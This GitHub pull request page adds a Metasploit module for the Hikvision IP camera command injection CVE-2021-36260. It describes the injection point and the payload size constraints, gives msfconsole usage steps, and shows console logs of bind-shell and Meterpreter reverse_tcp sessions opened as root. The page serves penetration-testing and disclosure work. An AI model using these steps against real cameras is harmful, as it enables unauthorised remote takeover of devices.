Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Hikvision Unauthenticated RCE (CVE-2021-36260) #16204

Merged
merged 4 commits into from Feb 25, 2022
Merged

Hikvision Unauthenticated RCE (CVE-2021-36260) #16204

merged 4 commits into from Feb 25, 2022

Conversation

jbaines-r7
Copy link
Contributor

Description

This module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the /SDK/webLanguage endpoint, resulting in command execution as the root user.

This module specifically attempts to exploit the blind variant of the attack. The module was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725. Please see the Hikvision advisory for a full list of affected products.

Background

Shodan shows there are approximately 3 million internet facing Hikvision cameras. While only a subset of cameras are affected, that still indicates a very large amount of vulnerable systems out in the world.

This vulnerability was reportedly added to the Moobot botnet in December, and continues to be actively exploited. Interestingly, some exploits seen in the wild would not actually work against my test target because their payloads are much too large (indicating variations of the vulnerability across different firmware).

Implementation Oddities

The injection space, in the worst case, is very small. The snprintf that builds the vulnerable string only allows for 0x1f bytes and the format string is:

/dav/%s.tar.gz

Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately, snprintf will let us reclaim '.tar.gz'. So in reality, there are 26 bytes for our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes for payload. The 'echo' stager has a minimum of 26 bytes but we obviously don't have that much space. We can steal the extra space from the "random" file name and compress ' >> ' to '>>'. That will get us below 23. Squeezing the extra bytes will also allow printf stager to do more than 1 byte per exploitation.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/hikvision_cve_2021_36260_blind
  • set RHOST <ip>
  • check
  • Verify the remote target is flagged as vulnerable
  • set LHOST <ip>
  • exploit
  • You should get a bind shell.

PCAPS || GFTO

Two pcaps: one for the bind shell and one for reverse tcp stager.

hikvision_metasploit.zip

Video || GTFO

https://www.youtube.com/watch?v=3NzdQxqZJqc

@jbaines-r7 jbaines-r7 changed the title Hikvision Unauthenticated (CVE-2021-36260) Hikvision Unauthenticated RCE (CVE-2021-36260) Feb 20, 2022
@jbaines-r7
Copy link
Contributor Author

jbaines-r7 commented Feb 24, 2022
edited

Addressed @bwatters-r7 comments. Also realized I didn't randomize the replaced filename, so I went ahead and did that. I can post a new pcap if desired, but for now, everything appears to still work.

msf6 exploit(linux/http/hikvision_cve_2021_36260_blind) > check
[+] 10.0.0.9:80 - The target is vulnerable. It appears the target executed the provided sleep command.
msf6 exploit(linux/http/hikvision_cve_2021_36260_blind) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. It appears the target executed the provided sleep command.
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 10.0.0.9:4444
[*] Command shell session 1 opened (10.0.0.2:36169 -> 10.0.0.9:4444 ) at 2022-02-24 06:36:14 -0800


Shell Banner:
_
-----
          

# exit  
exit

[*] 10.0.0.9 - Command shell session 1 closed.
msf6 exploit(linux/http/hikvision_cve_2021_36260_blind) > set target 1
target => 1
msf6 exploit(linux/http/hikvision_cve_2021_36260_blind) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. It appears the target executed the provided sleep command.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Command Stager progress -   0.38% done (25/6557 bytes)
[*] Command Stager progress -   0.76% done (50/6557 bytes)
[*] Command Stager progress -   1.14% done (75/6557 bytes)
[*] Command Stager progress -   1.53% done (100/6557 bytes)
[*] Command Stager progress -   1.91% done (125/6557 bytes)
[*] Command Stager progress -   2.29% done (150/6557 bytes)
[*] Command Stager progress -   2.67% done (175/6557 bytes)
[*] Command Stager progress -   3.05% done (200/6557 bytes)
[*] Command Stager progress -   3.43% done (225/6557 bytes)
[*] Command Stager progress -   3.81% done (250/6557 bytes)
[*] Command Stager progress -   4.19% done (275/6557 bytes)
[*] Command Stager progress -   4.59% done (301/6557 bytes)
[*] Command Stager progress -   4.97% done (326/6557 bytes)
[*] Command Stager progress -   5.35% done (351/6557 bytes)
[*] Command Stager progress -   5.73% done (376/6557 bytes)
[*] Command Stager progress -   6.12% done (401/6557 bytes)
[*] Command Stager progress -   6.50% done (426/6557 bytes)
[*] Command Stager progress -   6.89% done (452/6557 bytes)
[*] Command Stager progress -   7.27% done (477/6557 bytes)
[*] Command Stager progress -   7.66% done (502/6557 bytes)
[*] Command Stager progress -   8.04% done (527/6557 bytes)
[*] Command Stager progress -   8.42% done (552/6557 bytes)
[*] Command Stager progress -   8.80% done (577/6557 bytes)
[*] Command Stager progress -   9.20% done (603/6557 bytes)
[*] Command Stager progress -   9.59% done (629/6557 bytes)
[*] Command Stager progress -   9.97% done (654/6557 bytes)
[*] Command Stager progress -  10.36% done (679/6557 bytes)
[*] Command Stager progress -  10.74% done (704/6557 bytes)
[*] Command Stager progress -  11.12% done (729/6557 bytes)
[*] Command Stager progress -  11.50% done (754/6557 bytes)
[*] Command Stager progress -  11.88% done (779/6557 bytes)
[*] Command Stager progress -  12.26% done (804/6557 bytes)
[*] Command Stager progress -  12.64% done (829/6557 bytes)
[*] Command Stager progress -  12.99% done (852/6557 bytes)
[*] Command Stager progress -  13.38% done (877/6557 bytes)
[*] Command Stager progress -  13.76% done (902/6557 bytes)
[*] Command Stager progress -  14.11% done (925/6557 bytes)
[*] Command Stager progress -  14.49% done (950/6557 bytes)
[*] Command Stager progress -  14.87% done (975/6557 bytes)
[*] Command Stager progress -  15.25% done (1000/6557 bytes)
[*] Command Stager progress -  15.63% done (1025/6557 bytes)
[*] Command Stager progress -  15.98% done (1048/6557 bytes)
[*] Command Stager progress -  16.36% done (1073/6557 bytes)
[*] Command Stager progress -  16.75% done (1098/6557 bytes)
[*] Command Stager progress -  17.13% done (1123/6557 bytes)
[*] Command Stager progress -  17.51% done (1148/6557 bytes)
[*] Command Stager progress -  17.89% done (1173/6557 bytes)
[*] Command Stager progress -  18.29% done (1199/6557 bytes)
[*] Command Stager progress -  18.64% done (1222/6557 bytes)
[*] Command Stager progress -  19.02% done (1247/6557 bytes)
[*] Command Stager progress -  19.40% done (1272/6557 bytes)
[*] Command Stager progress -  19.78% done (1297/6557 bytes)
[*] Command Stager progress -  20.16% done (1322/6557 bytes)
[*] Command Stager progress -  20.54% done (1347/6557 bytes)
[*] Command Stager progress -  20.92% done (1372/6557 bytes)
[*] Command Stager progress -  21.31% done (1397/6557 bytes)
[*] Command Stager progress -  21.70% done (1423/6557 bytes)
[*] Command Stager progress -  22.08% done (1448/6557 bytes)
[*] Command Stager progress -  22.46% done (1473/6557 bytes)
[*] Command Stager progress -  22.86% done (1499/6557 bytes)
[*] Command Stager progress -  23.24% done (1524/6557 bytes)
[*] Command Stager progress -  23.62% done (1549/6557 bytes)
[*] Command Stager progress -  24.00% done (1574/6557 bytes)
[*] Command Stager progress -  24.36% done (1597/6557 bytes)
[*] Command Stager progress -  24.74% done (1622/6557 bytes)
[*] Command Stager progress -  25.12% done (1647/6557 bytes)
[*] Command Stager progress -  25.50% done (1672/6557 bytes)
[*] Command Stager progress -  25.88% done (1697/6557 bytes)
[*] Command Stager progress -  26.28% done (1723/6557 bytes)
[*] Command Stager progress -  26.63% done (1746/6557 bytes)
[*] Command Stager progress -  27.01% done (1771/6557 bytes)
[*] Command Stager progress -  27.36% done (1794/6557 bytes)
[*] Command Stager progress -  27.74% done (1819/6557 bytes)
[*] Command Stager progress -  28.12% done (1844/6557 bytes)
[*] Command Stager progress -  28.50% done (1869/6557 bytes)
[*] Command Stager progress -  28.85% done (1892/6557 bytes)
[*] Command Stager progress -  29.24% done (1917/6557 bytes)
[*] Command Stager progress -  29.62% done (1942/6557 bytes)
[*] Command Stager progress -  30.00% done (1967/6557 bytes)
[*] Command Stager progress -  30.38% done (1992/6557 bytes)
[*] Command Stager progress -  30.75% done (2016/6557 bytes)
[*] Command Stager progress -  31.13% done (2041/6557 bytes)
[*] Command Stager progress -  31.51% done (2066/6557 bytes)
[*] Command Stager progress -  31.87% done (2090/6557 bytes)
[*] Command Stager progress -  32.24% done (2114/6557 bytes)
[*] Command Stager progress -  32.62% done (2139/6557 bytes)
[*] Command Stager progress -  33.00% done (2164/6557 bytes)
[*] Command Stager progress -  33.38% done (2189/6557 bytes)
[*] Command Stager progress -  33.73% done (2212/6557 bytes)
[*] Command Stager progress -  34.12% done (2237/6557 bytes)
[*] Command Stager progress -  34.50% done (2262/6557 bytes)
[*] Command Stager progress -  34.88% done (2287/6557 bytes)
[*] Command Stager progress -  35.26% done (2312/6557 bytes)
[*] Command Stager progress -  35.66% done (2338/6557 bytes)
[*] Command Stager progress -  36.01% done (2361/6557 bytes)
[*] Command Stager progress -  36.39% done (2386/6557 bytes)
[*] Command Stager progress -  36.79% done (2412/6557 bytes)
[*] Command Stager progress -  37.17% done (2437/6557 bytes)
[*] Command Stager progress -  37.55% done (2462/6557 bytes)
[*] Command Stager progress -  37.90% done (2485/6557 bytes)
[*] Command Stager progress -  38.28% done (2510/6557 bytes)
[*] Command Stager progress -  38.66% done (2535/6557 bytes)
[*] Command Stager progress -  39.04% done (2560/6557 bytes)
[*] Command Stager progress -  39.41% done (2584/6557 bytes)
[*] Command Stager progress -  39.79% done (2609/6557 bytes)
[*] Command Stager progress -  40.17% done (2634/6557 bytes)
[*] Command Stager progress -  40.55% done (2659/6557 bytes)
[*] Command Stager progress -  40.92% done (2683/6557 bytes)
[*] Command Stager progress -  41.28% done (2707/6557 bytes)
[*] Command Stager progress -  41.67% done (2732/6557 bytes)
[*] Command Stager progress -  42.05% done (2757/6557 bytes)
[*] Command Stager progress -  42.44% done (2783/6557 bytes)
[*] Command Stager progress -  42.82% done (2808/6557 bytes)
[*] Command Stager progress -  43.21% done (2833/6557 bytes)
[*] Command Stager progress -  43.60% done (2859/6557 bytes)
[*] Command Stager progress -  43.98% done (2884/6557 bytes)
[*] Command Stager progress -  44.36% done (2909/6557 bytes)
[*] Command Stager progress -  44.75% done (2934/6557 bytes)
[*] Command Stager progress -  45.10% done (2957/6557 bytes)
[*] Command Stager progress -  45.48% done (2982/6557 bytes)
[*] Command Stager progress -  45.86% done (3007/6557 bytes)
[*] Command Stager progress -  46.24% done (3032/6557 bytes)
[*] Command Stager progress -  46.62% done (3057/6557 bytes)
[*] Command Stager progress -  47.02% done (3083/6557 bytes)
[*] Command Stager progress -  47.37% done (3106/6557 bytes)
[*] Command Stager progress -  47.75% done (3131/6557 bytes)
[*] Command Stager progress -  48.15% done (3157/6557 bytes)
[*] Command Stager progress -  48.53% done (3182/6557 bytes)
[*] Command Stager progress -  48.91% done (3207/6557 bytes)
[*] Command Stager progress -  49.29% done (3232/6557 bytes)
[*] Command Stager progress -  49.66% done (3256/6557 bytes)
[*] Command Stager progress -  50.04% done (3281/6557 bytes)
[*] Command Stager progress -  50.42% done (3306/6557 bytes)
[*] Command Stager progress -  50.82% done (3332/6557 bytes)
[*] Command Stager progress -  51.17% done (3355/6557 bytes)
[*] Command Stager progress -  51.55% done (3380/6557 bytes)
[*] Command Stager progress -  51.94% done (3406/6557 bytes)
[*] Command Stager progress -  52.33% done (3431/6557 bytes)
[*] Command Stager progress -  52.71% done (3456/6557 bytes)
[*] Command Stager progress -  53.10% done (3482/6557 bytes)
[*] Command Stager progress -  53.48% done (3507/6557 bytes)
[*] Command Stager progress -  53.87% done (3532/6557 bytes)
[*] Command Stager progress -  54.26% done (3558/6557 bytes)
[*] Command Stager progress -  54.64% done (3583/6557 bytes)
[*] Command Stager progress -  55.03% done (3608/6557 bytes)
[*] Command Stager progress -  55.41% done (3633/6557 bytes)
[*] Command Stager progress -  55.79% done (3658/6557 bytes)
[*] Command Stager progress -  56.17% done (3683/6557 bytes)
[*] Command Stager progress -  56.55% done (3708/6557 bytes)
[*] Command Stager progress -  56.93% done (3733/6557 bytes)
[*] Command Stager progress -  57.31% done (3758/6557 bytes)
[*] Command Stager progress -  57.69% done (3783/6557 bytes)
[*] Command Stager progress -  58.09% done (3809/6557 bytes)
[*] Command Stager progress -  58.47% done (3834/6557 bytes)
[*] Command Stager progress -  58.85% done (3859/6557 bytes)
[*] Command Stager progress -  59.23% done (3884/6557 bytes)
[*] Command Stager progress -  59.60% done (3908/6557 bytes)
[*] Command Stager progress -  59.98% done (3933/6557 bytes)
[*] Command Stager progress -  60.36% done (3958/6557 bytes)
[*] Command Stager progress -  60.71% done (3981/6557 bytes)
[*] Command Stager progress -  61.10% done (4006/6557 bytes)
[*] Command Stager progress -  61.48% done (4031/6557 bytes)
[*] Command Stager progress -  61.86% done (4056/6557 bytes)
[*] Command Stager progress -  62.21% done (4079/6557 bytes)
[*] Command Stager progress -  62.59% done (4104/6557 bytes)
[*] Command Stager progress -  62.97% done (4129/6557 bytes)
[*] Command Stager progress -  63.35% done (4154/6557 bytes)
[*] Command Stager progress -  63.73% done (4179/6557 bytes)
[*] Command Stager progress -  64.08% done (4202/6557 bytes)
[*] Command Stager progress -  64.47% done (4227/6557 bytes)
[*] Command Stager progress -  64.85% done (4252/6557 bytes)
[*] Command Stager progress -  65.23% done (4277/6557 bytes)
[*] Command Stager progress -  65.61% done (4302/6557 bytes)
[*] Command Stager progress -  66.01% done (4328/6557 bytes)
[*] Command Stager progress -  66.40% done (4354/6557 bytes)
[*] Command Stager progress -  66.78% done (4379/6557 bytes)
[*] Command Stager progress -  67.16% done (4404/6557 bytes)
[*] Command Stager progress -  67.55% done (4429/6557 bytes)
[*] Command Stager progress -  67.93% done (4454/6557 bytes)
[*] Command Stager progress -  68.32% done (4480/6557 bytes)
[*] Command Stager progress -  68.71% done (4505/6557 bytes)
[*] Command Stager progress -  69.09% done (4530/6557 bytes)
[*] Command Stager progress -  69.48% done (4556/6557 bytes)
[*] Command Stager progress -  69.86% done (4581/6557 bytes)
[*] Command Stager progress -  70.25% done (4606/6557 bytes)
[*] Command Stager progress -  70.64% done (4632/6557 bytes)
[*] Command Stager progress -  71.02% done (4657/6557 bytes)
[*] Command Stager progress -  71.40% done (4682/6557 bytes)
[*] Command Stager progress -  71.80% done (4708/6557 bytes)
[*] Command Stager progress -  72.18% done (4733/6557 bytes)
[*] Command Stager progress -  72.56% done (4758/6557 bytes)
[*] Command Stager progress -  72.94% done (4783/6557 bytes)
[*] Command Stager progress -  73.31% done (4807/6557 bytes)
[*] Command Stager progress -  73.69% done (4832/6557 bytes)
[*] Command Stager progress -  74.07% done (4857/6557 bytes)
[*] Command Stager progress -  74.47% done (4883/6557 bytes)
[*] Command Stager progress -  74.85% done (4908/6557 bytes)
[*] Command Stager progress -  75.23% done (4933/6557 bytes)
[*] Command Stager progress -  75.61% done (4958/6557 bytes)
[*] Command Stager progress -  76.00% done (4983/6557 bytes)
[*] Command Stager progress -  76.38% done (5008/6557 bytes)
[*] Command Stager progress -  76.76% done (5033/6557 bytes)
[*] Command Stager progress -  77.11% done (5056/6557 bytes)
[*] Command Stager progress -  77.49% done (5081/6557 bytes)
[*] Command Stager progress -  77.87% done (5106/6557 bytes)
[*] Command Stager progress -  78.24% done (5130/6557 bytes)
[*] Command Stager progress -  78.62% done (5155/6557 bytes)
[*] Command Stager progress -  79.00% done (5180/6557 bytes)
[*] Command Stager progress -  79.38% done (5205/6557 bytes)
[*] Command Stager progress -  79.73% done (5228/6557 bytes)
[*] Command Stager progress -  80.11% done (5253/6557 bytes)
[*] Command Stager progress -  80.49% done (5278/6557 bytes)
[*] Command Stager progress -  80.88% done (5303/6557 bytes)
[*] Command Stager progress -  81.26% done (5328/6557 bytes)
[*] Command Stager progress -  81.64% done (5353/6557 bytes)
[*] Command Stager progress -  81.99% done (5376/6557 bytes)
[*] Command Stager progress -  82.37% done (5401/6557 bytes)
[*] Command Stager progress -  82.75% done (5426/6557 bytes)
[*] Command Stager progress -  83.13% done (5451/6557 bytes)
[*] Command Stager progress -  83.51% done (5476/6557 bytes)
[*] Command Stager progress -  83.90% done (5501/6557 bytes)
[*] Command Stager progress -  84.28% done (5526/6557 bytes)
[*] Command Stager progress -  84.64% done (5550/6557 bytes)
[*] Command Stager progress -  85.02% done (5575/6557 bytes)
[*] Command Stager progress -  85.40% done (5600/6557 bytes)
[*] Command Stager progress -  85.79% done (5625/6557 bytes)
[*] Command Stager progress -  86.14% done (5648/6557 bytes)
[*] Command Stager progress -  86.52% done (5673/6557 bytes)
[*] Command Stager progress -  86.90% done (5698/6557 bytes)
[*] Command Stager progress -  87.28% done (5723/6557 bytes)
[*] Command Stager progress -  87.66% done (5748/6557 bytes)
[*] Command Stager progress -  88.04% done (5773/6557 bytes)
[*] Command Stager progress -  88.39% done (5796/6557 bytes)
[*] Command Stager progress -  88.78% done (5821/6557 bytes)
[*] Command Stager progress -  89.13% done (5844/6557 bytes)
[*] Command Stager progress -  89.51% done (5869/6557 bytes)
[*] Command Stager progress -  89.89% done (5894/6557 bytes)
[*] Command Stager progress -  90.27% done (5919/6557 bytes)
[*] Command Stager progress -  90.62% done (5942/6557 bytes)
[*] Command Stager progress -  91.00% done (5967/6557 bytes)
[*] Command Stager progress -  91.38% done (5992/6557 bytes)
[*] Command Stager progress -  91.76% done (6017/6557 bytes)
[*] Command Stager progress -  92.15% done (6042/6557 bytes)
[*] Command Stager progress -  92.53% done (6067/6557 bytes)
[*] Command Stager progress -  92.91% done (6092/6557 bytes)
[*] Command Stager progress -  93.29% done (6117/6557 bytes)
[*] Command Stager progress -  93.64% done (6140/6557 bytes)
[*] Command Stager progress -  94.02% done (6165/6557 bytes)
[*] Command Stager progress -  94.40% done (6190/6557 bytes)
[*] Command Stager progress -  94.77% done (6214/6557 bytes)
[*] Command Stager progress -  95.15% done (6239/6557 bytes)
[*] Command Stager progress -  95.55% done (6265/6557 bytes)
[*] Command Stager progress -  95.93% done (6290/6557 bytes)
[*] Command Stager progress -  96.32% done (6316/6557 bytes)
[*] Command Stager progress -  96.71% done (6341/6557 bytes)
[*] Command Stager progress -  97.06% done (6364/6557 bytes)
[*] Command Stager progress -  97.44% done (6389/6557 bytes)
[*] Command Stager progress -  97.82% done (6414/6557 bytes)
[*] Command Stager progress -  98.20% done (6439/6557 bytes)
[*] Command Stager progress -  98.57% done (6463/6557 bytes)
[*] Command Stager progress -  98.96% done (6489/6557 bytes)
[*] Command Stager progress -  99.31% done (6512/6557 bytes)
[*] Command Stager progress -  99.60% done (6531/6557 bytes)
[*] Sending stage (908480 bytes) to 10.0.0.9
[*] Command Stager progress -  99.76% done (6541/6557 bytes)
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.9:36679 ) at 2022-02-24 06:37:53 -0800
[*] Command Stager progress - 100.00% done (6557/6557 bytes)

meterpreter > quit
[*] Shutting down Meterpreter...

[*] 10.0.0.9 - Meterpreter session 2 closed.  Reason: User exit

@bwatters-r7
Copy link
Contributor

Could I get a new pcap for just the bind shell?

@bwatters-r7 bwatters-r7 self-assigned this Feb 24, 2022
@jbaines-r7
Copy link
Contributor Author

Could I get a new pcap for just the bind shell?

Attached!

hikvision_bindshell_updated.zip

@bwatters-r7 bwatters-r7 merged commit ecaf8b1 into rapid7:master Feb 25, 2022
@bwatters-r7
Copy link
Contributor

Release Notes

This module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the /SDK/webLanguage endpoint, resulting in command execution as the root user.

@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 3, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@dwelch-r7 dwelch-r7 dwelch-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@jbaines-r7 @bwatters-r7 @dwelch-r7 @bcoles @smcintyre-r7